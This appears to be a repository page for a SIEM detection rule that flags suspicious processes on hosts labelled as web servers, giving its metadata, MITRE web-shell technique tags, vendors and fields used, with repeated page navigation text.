Rules: Web Servers Executing Suspicious Processes

Description

This rule looks for suspicious processes on all systems labeled as web servers. A list of web servers should be populated in order to enable the rule.

Additional Details

Detail	Value
Type	Templated Match
Category	Defense Evasion
Apply Risk to Entities	device_hostname, device_ip, user_username
Signal Name	Web Servers Executing Suspicious Processes
Summary Expression	Suspicious process detected on host: {{device_hostname}} designated a web server
Score/Severity	Static: 4
Enabled by Default	False
Prototype	False
Tags	_mitreAttackTactic:TA0003, _mitreAttackTechnique:T1505, _mitreAttackTechnique:T1505.003

Vendors and Products

Microsoft - Azure
Microsoft - Windows

Fields Used

Origin	Field
Normalized Schema	commandLine
Normalized Schema	device_hostname
Normalized Schema	device_ip
Normalized Schema	listMatches
Normalized Schema	user_username

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

MATCH-S00539.md

MATCH-S00539.md

Rules: Web Servers Executing Suspicious Processes

Description

Additional Details

Vendors and Products

Fields Used

Files

MATCH-S00539.md

Latest commit

History

MATCH-S00539.md

File metadata and controls

Rules: Web Servers Executing Suspicious Processes

Description

Additional Details

Vendors and Products

Fields Used